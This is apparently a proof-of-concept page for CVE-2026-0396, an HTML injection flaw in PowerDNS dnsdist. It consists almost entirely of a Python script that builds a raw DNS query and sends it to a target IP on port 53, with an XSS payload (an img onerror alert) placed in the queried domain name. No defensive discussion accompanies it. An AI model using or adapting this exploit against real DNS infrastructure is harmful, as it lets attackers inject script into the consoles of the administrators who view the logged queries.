CVE-2026-0396 PowerDNS dnsdist HTML注入漏洞

# PoC for CVE-2026-0396: HTML Injection in dnsdist import socket import struct def send_dns_query(target_ip, domain): # DNS Header transaction_id = 0x1234 flags = 0x0100 # Standard query questions = 1 answer_rrs = 0 authority_rrs = 0 additional_rrs = 0 header = struct.pack('!HHHHHH', transaction_id, flags, questions, answer_rrs, authority_rrs, additional_rrs) # DNS Question # Encode domain name (e.g., <img src=x onerror=alert(1)>.example.com) query_body = b'' for part in domain.split('.'): if part: query_body += bytes([len(part)]) + part.encode() query_body += b'\x00' # End of name query_body += struct.pack('!HH', 1, 1) # Type A, Class IN packet = header + query_body sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(packet, (target_ip, 53)) sock.close() print(f"Sent payload to {target_ip} for domain: {domain}") # Usage target = "192.168.1.100" # Replace with actual target payload_domain = "<img src=x onerror=alert('CVE-2026-0396')>.example.com" send_dns_query(target, payload_domain)